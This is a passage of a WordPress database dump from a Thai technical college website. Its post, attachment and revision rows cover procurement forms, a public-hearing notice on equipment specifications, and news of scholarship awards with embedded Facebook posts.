(4609, 3, '2018-11-16 15:01:11', '2018-11-16 08:01:11', '', '16-11-2561 14-52-31', '', 'inherit', 'closed', 'closed', '', '16-11-2561-14-52-31', '', '', '2018-11-16 15:01:11', '2018-11-16 08:01:11', '', 1545, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/16-11-2561-14-52-31.jpg', 0, 'attachment', 'image/jpeg', 0),
(4611, 3, '2018-11-16 15:07:32', '2018-11-16 08:07:32', '', '16-11-2561 15-10-30', '', 'inherit', 'closed', 'closed', '', '16-11-2561-15-10-30', '', '', '2018-11-16 15:07:32', '2018-11-16 08:07:32', '', 1545, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg', 0, 'attachment', 'image/jpeg', 0),
(4612, 3, '2018-11-16 15:07:44', '2018-11-16 08:07:44', '', 'Picture1', '', 'inherit', 'closed', 'closed', '', 'picture1', '', '', '2018-11-16 15:07:44', '2018-11-16 08:07:44', '', 1545, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/Picture1.png', 0, 'attachment', 'image/png', 0),
(4614, 3, '2018-11-16 15:09:08', '2018-11-16 08:09:08', '<img class=\"aligncenter size-full wp-image-4609\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-52-31.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"377\" height=\"103\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4611\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\" alt=\"\" width=\"162\" height=\"204\" />\r\n\r\n<img class=\"aligncenter wp-image-4612\" src=\"/wp-content/uploads/2018/11/Picture1-300x80.png\" alt=\"\" width=\"386\" height=\"103\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4613\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-03-53.jpg\" alt=\"\" width=\"696\" height=\"639\" />\r\n<h4><span style=\"color: #0000ff;\">** <a href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-.doc\">แบบฟอร์ม สผ.งาน</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #339966;\">**แบบฟอร์มการจัดทำ SPEC</span></span></h4>\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มคุณลักษณะครุภัณฑ์.doc\">แบบฟอร์มคุณลักษณะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ขั้นตอนการจัดทำSPEC.pdf\">ขั้นตอนการจัดทำSPEC</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์.doc\">ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์-_.doc\">ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์ </a></span>\r\n\r\n ', 'งานพัสดุ', '', 'inherit', 'closed', 'closed', '', '1545-revision-v1', '', '', '2018-11-16 15:09:08', '2018-11-16 08:09:08', '', 1545, 'http://www.technicrayong.ac.th/1545-revision-v1/', 0, 'revision', '', 0),
(4616, 3, '2018-11-16 15:29:56', '2018-11-16 08:29:56', '<img class=\"aligncenter size-full wp-image-4609\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-52-31.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"377\" height=\"103\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4611\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\" alt=\"\" width=\"162\" height=\"204\" />\r\n\r\n<img class=\"aligncenter wp-image-4612\" src=\"/wp-content/uploads/2018/11/Picture1-300x80.png\" alt=\"\" width=\"386\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-4617 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\" alt=\"\" width=\"1109\" height=\"345\" />\r\n<h4><span style=\"color: #0000ff;\">** <a href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-.doc\">แบบฟอร์ม สผ.งาน</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #339966;\">**แบบฟอร์มการจัดทำ SPEC</span></span></h4>\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มคุณลักษณะครุภัณฑ์.doc\">แบบฟอร์มคุณลักษณะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ขั้นตอนการจัดทำSPEC.pdf\">ขั้นตอนการจัดทำSPEC</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์.doc\">ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์-_.doc\">ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์ </a></span>\r\n\r\n ', 'งานพัสดุ', '', 'inherit', 'closed', 'closed', '', '1545-autosave-v1', '', '', '2018-11-16 15:29:56', '2018-11-16 08:29:56', '', 1545, 'http://www.technicrayong.ac.th/1545-autosave-v1/', 0, 'revision', '', 0),
(4617, 3, '2018-11-16 15:28:14', '2018-11-16 08:28:14', '', '16-11-2561 15-30-44', '', 'inherit', 'closed', 'closed', '', '16-11-2561-15-30-44', '', '', '2018-11-16 15:28:14', '2018-11-16 08:28:14', '', 1545, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg', 0, 'attachment', 'image/jpeg', 0),
(4618, 3, '2018-11-16 15:28:41', '2018-11-16 08:28:41', '<img class=\"aligncenter size-full wp-image-4609\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-52-31.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"377\" height=\"103\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4611\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\" alt=\"\" width=\"162\" height=\"204\" />\r\n\r\n<img class=\"aligncenter wp-image-4612\" src=\"/wp-content/uploads/2018/11/Picture1-300x80.png\" alt=\"\" width=\"386\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-4617 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\" alt=\"\" width=\"1109\" height=\"345\" />\r\n<h4><span style=\"color: #0000ff;\">** <a href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-.doc\">แบบฟอร์ม สผ.งาน</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #339966;\">**แบบฟอร์มการจัดทำ SPEC</span></span></h4>\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มคุณลักษณะครุภัณฑ์.doc\">แบบฟอร์มคุณลักษณะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ขั้นตอนการจัดทำSPEC.pdf\">ขั้นตอนการจัดทำSPEC</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์.doc\">ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์-_.doc\">ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์ </a></span>\r\n\r\n ', 'งานพัสดุ', '', 'inherit', 'closed', 'closed', '', '1545-revision-v1', '', '', '2018-11-16 15:28:41', '2018-11-16 08:28:41', '', 1545, 'http://www.technicrayong.ac.th/1545-revision-v1/', 0, 'revision', '', 0),
(4619, 3, '2018-11-19 12:29:55', '2018-11-19 05:29:55', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%932562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<ul>\r\n <li>\r\n<h2><span style=\"color: #993300;\"><a style=\"color: #993300;\" href=\"/wp-content/uploads/2018/11/ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์-3.pdf\">ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์</a></span></h2>\r\n</li>\r\n <li>\r\n<h2><span style=\"color: #993300;\"><a style=\"color: #993300;\" href=\"/wp-content/uploads/2018/11/ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ-2.pdf\">ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ</a></span></h2>\r\n</li>\r\n <li>\r\n<h2><span style=\"color: #993300;\"><a style=\"color: #993300;\" href=\"/wp-content/uploads/2018/11/ชุดฝึกหุ่นยนต์อุตสาหกรรม-2.pdf\">ชุดฝึกหุ่นยนต์อุตสาหกรรม</a></span></h2>\r\n</li>\r\n</ul>\r\n<h2></h2>', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์การศึกษา สาชาวิชาช่างยนต์ สาขาวิชาช่างอิเล็กทรอนิกส์ ประจำปีงบประมาณ ๒๕๖๒', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c%e0%b8%a3%e0%b8%b2%e0%b8%a2-2', '', '', '2018-11-19 12:32:12', '2018-11-19 05:32:12', '', 0, 'http://www.technicrayong.ac.th/?p=4619', 246, 'post', '', 0),
(4622, 3, '2018-11-19 12:13:07', '2018-11-19 05:13:07', '', 'ประกาศ ประชาพิจารณ์ ประจำปีงบประมาณ2562', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c-%e0%b8%9b%e0%b8%a3%e0%b8%b0-3', '', '', '2018-11-19 12:13:07', '2018-11-19 05:13:07', '', 4619, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-ประชาพิจารณ์-ประจำปีงบประมาณ2562.pdf', 0, 'attachment', 'application/pdf', 0),
(4623, 3, '2018-11-19 12:15:04', '2018-11-19 05:15:04', '', 'ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์ (3)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%8a%e0%b8%b8%e0%b8%94%e0%b8%97%e0%b8%94%e0%b8%a5%e0%b8%ad%e0%b8%87%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%a7-2', '', '', '2018-11-19 12:15:04', '2018-11-19 05:15:04', '', 4619, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์-3.pdf', 0, 'attachment', 'application/pdf', 0),
(4624, 3, '2018-11-19 12:16:57', '2018-11-19 05:16:57', '', 'ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ (2)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%8a%e0%b8%b8%e0%b8%94%e0%b8%9d%e0%b8%b6%e0%b8%81%e0%b8%ad%e0%b8%b4%e0%b9%80%e0%b8%a5%e0%b9%87%e0%b8%81%e0%b8%97%e0%b8%a3%e0%b8%ad%e0%b8%99%e0%b8%b4%e0%b8%81%e0%b8%aa%e0%b9%8c%e0%b8%ad%e0%b8%b1-2', '', '', '2018-11-19 12:16:57', '2018-11-19 05:16:57', '', 4619, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ-2.pdf', 0, 'attachment', 'application/pdf', 0),
(4625, 3, '2018-11-19 12:25:45', '2018-11-19 05:25:45', '', 'ชุดฝึกหุ่นยนต์อุตสาหกรรม (2)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%8a%e0%b8%b8%e0%b8%94%e0%b8%9d%e0%b8%b6%e0%b8%81%e0%b8%ab%e0%b8%b8%e0%b9%88%e0%b8%99%e0%b8%a2%e0%b8%99%e0%b8%95%e0%b9%8c%e0%b8%ad%e0%b8%b8%e0%b8%95%e0%b8%aa%e0%b8%b2%e0%b8%ab%e0%b8%81%e0%b8%a3-2', '', '', '2018-11-19 12:25:45', '2018-11-19 05:25:45', '', 4619, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ชุดฝึกหุ่นยนต์อุตสาหกรรม-2.pdf', 0, 'attachment', 'application/pdf', 0),
(4626, 3, '2018-11-19 12:29:55', '2018-11-19 05:29:55', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%932562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\nชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์\r\n\r\nชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ\r\n\r\nชุดฝึกหุ่นยนต์อุตสาหกรรม\r\n\r\n ', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์การศึกษา สาชาวิชาช่างยนต์ สาขาวิชาช่างอิเล็กทรอนิกส์ ประจำปีงบประมาณ ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4619-revision-v1', '', '', '2018-11-19 12:29:55', '2018-11-19 05:29:55', '', 4619, 'http://www.technicrayong.ac.th/4619-revision-v1/', 0, 'revision', '', 0),
(4627, 3, '2018-11-19 12:33:09', '2018-11-19 05:33:09', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%932562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<ul>\r\n <li>\r\n<h2><span style=\"color: #993300;\"><a style=\"color: #993300;\" href=\"/wp-content/uploads/2018/11/ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์-3.pdf\">ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์</a></span></h2>\r\n</li>\r\n <li>\r\n<h2><span style=\"color: #993300;\"><a style=\"color: #993300;\" href=\"/wp-content/uploads/2018/11/ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ-2.pdf\">ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ</a></span></h2>\r\n</li>\r\n <li>\r\n<h2><span style=\"color: #993300;\"><a style=\"color: #993300;\" href=\"/wp-content/uploads/2018/11/ชุดฝึกหุ่นยนต์อุตสาหกรรม-2.pdf\">ชุดฝึกหุ่นยนต์อุตสาหกรรม</a></span></h2>\r\n</li>\r\n</ul>\r\n<h2></h2>', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์การศึกษา สาชาวิชาช่างยนต์ สาขาวิชาช่างอิเล็กทรอนิกส์ ประจำปีงบประมาณ ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4619-autosave-v1', '', '', '2018-11-19 12:33:09', '2018-11-19 05:33:09', '', 4619, 'http://www.technicrayong.ac.th/4619-autosave-v1/', 0, 'revision', '', 0),
(4628, 3, '2018-11-19 12:32:12', '2018-11-19 05:32:12', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%932562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<ul>\r\n <li>\r\n<h2><span style=\"color: #993300;\"><a style=\"color: #993300;\" href=\"/wp-content/uploads/2018/11/ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์-3.pdf\">ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์</a></span></h2>\r\n</li>\r\n <li>\r\n<h2><span style=\"color: #993300;\"><a style=\"color: #993300;\" href=\"/wp-content/uploads/2018/11/ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ-2.pdf\">ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ</a></span></h2>\r\n</li>\r\n <li>\r\n<h2><span style=\"color: #993300;\"><a style=\"color: #993300;\" href=\"/wp-content/uploads/2018/11/ชุดฝึกหุ่นยนต์อุตสาหกรรม-2.pdf\">ชุดฝึกหุ่นยนต์อุตสาหกรรม</a></span></h2>\r\n</li>\r\n</ul>\r\n<h2></h2>', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์การศึกษา สาชาวิชาช่างยนต์ สาขาวิชาช่างอิเล็กทรอนิกส์ ประจำปีงบประมาณ ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4619-revision-v1', '', '', '2018-11-19 12:32:12', '2018-11-19 05:32:12', '', 4619, 'http://www.technicrayong.ac.th/4619-revision-v1/', 0, 'revision', '', 0),
(4629, 3, '2018-11-20 13:44:54', '2018-11-20 06:44:54', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D706798493029675%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๑๓ พฤศจิกายน ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร คณะครู บุคลากรทางการศึกษา เข้าร่วมประชุมสภากาแฟ เพื่อปรึกษาหารือในการจัดการเรียนการสอนให้สอดคล้อง และเป็นไปในทิศทางเดียวกัน ตลอดจนปัญหาต่างๆที่เกิดขึ้น ณ อาคารบริหารธุรกิจ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%93-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2', '', '', '2018-11-20 13:44:54', '2018-11-20 06:44:54', '', 0, 'http://www.technicrayong.ac.th/?p=4629', 245, 'post', '', 0),
(4630, 3, '2018-11-20 13:44:36', '2018-11-20 06:44:36', '', '46049465_706795259696665_1553755851561369600_o', '', 'inherit', 'closed', 'closed', '', '46049465_706795259696665_1553755851561369600_o', '', '', '2018-11-20 13:44:36', '2018-11-20 06:44:36', '', 4629, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/46049465_706795259696665_1553755851561369600_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4631, 3, '2018-11-20 13:44:54', '2018-11-20 06:44:54', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D706798493029675%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๑๓ พฤศจิกายน ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร คณะครู บุคลากรทางการศึกษา เข้าร่วมประชุมสภากาแฟ เพื่อปรึกษาหารือในการจัดการเรียนการสอนให้สอดคล้อง และเป็นไปในทิศทางเดียวกัน ตลอดจนปัญหาต่างๆที่เกิดขึ้น ณ อาคารบริหารธุรกิจ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4629-revision-v1', '', '', '2018-11-20 13:44:54', '2018-11-20 06:44:54', '', 4629, 'http://www.technicrayong.ac.th/4629-revision-v1/', 0, 'revision', '', 0),
(4632, 3, '2018-11-20 13:53:09', '2018-11-20 06:53:09', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2045323622154498&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๑๓ พฤศจิกายน ๒๕๖๑ มูลนิธิช่วยเหลือนักเรียนยากจนอำเภอแกลง จัดพิธีมอบทุนการศึกษา ประจำภาคเรียนที่ ๒ ปีการศึกษา ๒๕๖๑ ณ ห้องประขุมสหกรณ์ออมทรัพย์ครูระยอง ซึ่งนักเรียน นักศึกษาวิทยาลัยเทคนิคระยองได้รับทุนการศึกษาแบบต่อเนื่องจากมูลนิธิช่วยเหลือนักเรียนยากจนอำเภอแกลง จำนวน ๔๙ ทุน รวมเป็นเงิน ๓๐๔,๐๐๐ บาท จากจำนวนทุนทั้งหมด ๒๔๙ ทุน รวมเป็นเงินทั้งสิ้น ๑,๓๗๘,๐๐๐ บาท', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%93-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2-2', '', '', '2018-11-20 13:53:10', '2018-11-20 06:53:10', '', 0, 'http://www.technicrayong.ac.th/?p=4632', 244, 'post', '', 0),
(4633, 3, '2018-11-20 13:52:48', '2018-11-20 06:52:48', '', '46095544_2045322895487904_8714218356997095424_n', '', 'inherit', 'closed', 'closed', '', '46095544_2045322895487904_8714218356997095424_n', '', '', '2018-11-20 13:52:48', '2018-11-20 06:52:48', '', 4632, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/46095544_2045322895487904_8714218356997095424_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(4634, 3, '2018-11-20 13:53:10', '2018-11-20 06:53:10', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2045323622154498&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๑๓ พฤศจิกายน ๒๕๖๑ มูลนิธิช่วยเหลือนักเรียนยากจนอำเภอแกลง จัดพิธีมอบทุนการศึกษา ประจำภาคเรียนที่ ๒ ปีการศึกษา ๒๕๖๑ ณ ห้องประขุมสหกรณ์ออมทรัพย์ครูระยอง ซึ่งนักเรียน นักศึกษาวิทยาลัยเทคนิคระยองได้รับทุนการศึกษาแบบต่อเนื่องจากมูลนิธิช่วยเหลือนักเรียนยากจนอำเภอแกลง จำนวน ๔๙ ทุน รวมเป็นเงิน ๓๐๔,๐๐๐ บาท จากจำนวนทุนทั้งหมด ๒๔๙ ทุน รวมเป็นเงินทั้งสิ้น ๑,๓๗๘,๐๐๐ บาท', '', 'inherit', 'closed', 'closed', '', '4632-revision-v1', '', '', '2018-11-20 13:53:10', '2018-11-20 06:53:10', '', 4632, 'http://www.technicrayong.ac.th/4632-revision-v1/', 0, 'revision', '', 0),
(4635, 3, '2018-11-20 14:00:21', '2018-11-20 07:00:21', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2051789654841228&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอาทิตย์ที่ ๑๘ พฤศจิกายน ๒๕๖๑ วัดปากน้ำ (สมุทรคงคาราม) มอบทุนการศึกษาแก่นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ในงานทอดกฐินสามัคคี จำนวน ๘ ทุน ทุนละ ๑,๕๐๐ บาท รวมเป็นเงิน ๑๒,๐๐๐ บาท', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b2%e0%b8%97%e0%b8%b4%e0%b8%95%e0%b8%a2%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%98-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2', '', '', '2018-11-20 14:00:21', '2018-11-20 07:00:21', '', 0, 'http://www.technicrayong.ac.th/?p=4635', 243, 'post', '', 0),
